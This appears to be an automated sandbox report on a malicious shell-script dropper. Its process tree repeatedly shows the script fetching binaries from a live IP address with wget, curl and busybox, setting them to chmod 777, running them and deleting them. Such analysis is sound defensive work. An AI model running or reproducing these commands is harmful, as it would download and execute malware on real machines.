Analysis
-
max time kernel
74s -
max time network
76s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
-
submitted
21-11-2024 07:02
General
-
Target
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
-
Size
10KB
-
MD5
a1defdb85efc4f43f3026f633f9d8642
-
SHA1
50c5a077d2f6661aae89e985d3ed38d1c6678db1
-
SHA256
9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2
-
SHA512
ccce629290ff01417dcfcaa9313b1d4fe996f2d0131a5e211a0d9b41c81883bc0aced8f92fce2e96cc8216fcd2be2d5c1703f77c54706880e444a2bbe868b459
-
SSDEEP
192:hhYH7jooSYSyovzbEXvHC+OU1RZEEhWsRH7jooECSyovzkXvHC+V1RZEEs:Pp1tOo
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Reads runtime system information 28 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
-
-
/bin/chmodchmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- File and Directory Permissions Modification
-
-
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Executes dropped EXE
-
-
/bin/rmrm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
-
-
/bin/chmodchmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- File and Directory Permissions Modification
-
-
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Executes dropped EXE
-
-
/bin/rmrm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
-
-
/bin/chmodchmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- File and Directory Permissions Modification
-
-
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Executes dropped EXE
-
-
/bin/rmrm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
-
-
/bin/chmodchmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- File and Directory Permissions Modification
-
-
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Executes dropped EXE
-
-
/bin/rmrm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
-
-
/bin/chmodchmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- File and Directory Permissions Modification
-
-
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Executes dropped EXE
-
-
/bin/rmrm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
-
-
/bin/chmodchmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- File and Directory Permissions Modification
-
-
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Executes dropped EXE
-
-
/bin/rmrm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
-
-
/bin/chmodchmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- File and Directory Permissions Modification
-
-
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8./nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Executes dropped EXE
-
-
/bin/rmrm nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
-
-
/bin/chmodchmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- File and Directory Permissions Modification
-
-
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Executes dropped EXE
-
-
/bin/rmrm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
-
-
/bin/chmodchmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- File and Directory Permissions Modification
-
-
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Executes dropped EXE
-
-
/bin/rmrm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
-
-
/bin/chmodchmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- File and Directory Permissions Modification
-
-
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Executes dropped EXE
-
-
/bin/rmrm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
-
-
/bin/chmodchmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- File and Directory Permissions Modification
-
-
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Executes dropped EXE
-
-
/bin/rmrm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
-
-
/bin/chmodchmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- File and Directory Permissions Modification
-
-
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Executes dropped EXE
-
-
/bin/rmrm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
-
-
/bin/chmodchmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- File and Directory Permissions Modification
-
-
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Executes dropped EXE
-
-
/bin/rmrm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
-
-
/bin/chmodchmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- File and Directory Permissions Modification
-
-
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Executes dropped EXE
-
-
/bin/rmrm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
-
-
/bin/chmodchmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- File and Directory Permissions Modification
-
-
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
- Executes dropped EXE
-
-
/bin/rmrm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG62⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
-
-
/bin/chmodchmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- File and Directory Permissions Modification
-
-
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
- Executes dropped EXE
-
-
/bin/rmrm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
-
-
/bin/chmodchmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- File and Directory Permissions Modification
-
-
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
- Executes dropped EXE
-
-
/bin/rmrm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
-
-
/bin/chmodchmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- File and Directory Permissions Modification
-
-
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
- Executes dropped EXE
-
-
/bin/rmrm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
-
-
/bin/chmodchmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- File and Directory Permissions Modification
-
-
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
- Executes dropped EXE
-
-
/bin/rmrm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK02⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
-
-
/bin/chmodchmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- File and Directory Permissions Modification
-
-
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
- Executes dropped EXE
-
-
/bin/rmrm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
-
-
/bin/chmodchmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- File and Directory Permissions Modification
-
-
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
- Executes dropped EXE
-
-
/bin/rmrm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
-
-
/bin/chmodchmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- File and Directory Permissions Modification
-
-
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
- Executes dropped EXE
-
-
/bin/rmrm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
-
-
/bin/chmodchmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- File and Directory Permissions Modification
-
-
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
- Executes dropped EXE
-
-
/bin/rmrm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
-
-
/bin/chmodchmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- File and Directory Permissions Modification
-
-
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
- Executes dropped EXE
-
-
/bin/rmrm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
-
-
/bin/chmodchmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- File and Directory Permissions Modification
-
-
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
- Executes dropped EXE
-
-
/bin/rmrm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
-
-
/bin/chmodchmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- File and Directory Permissions Modification
-
-
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8./nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
- Executes dropped EXE
-
-
/bin/rmrm nZK2byWknzW1gXWixRxIyczawUsL7rR9c82⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
-
-
/bin/chmodchmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- File and Directory Permissions Modification
-
-
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
- Executes dropped EXE
-
-
/bin/rmrm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ2⤵
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
-
-
/bin/chmodchmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- File and Directory Permissions Modification
-
-
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
- Executes dropped EXE
-
-
/bin/rmrm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97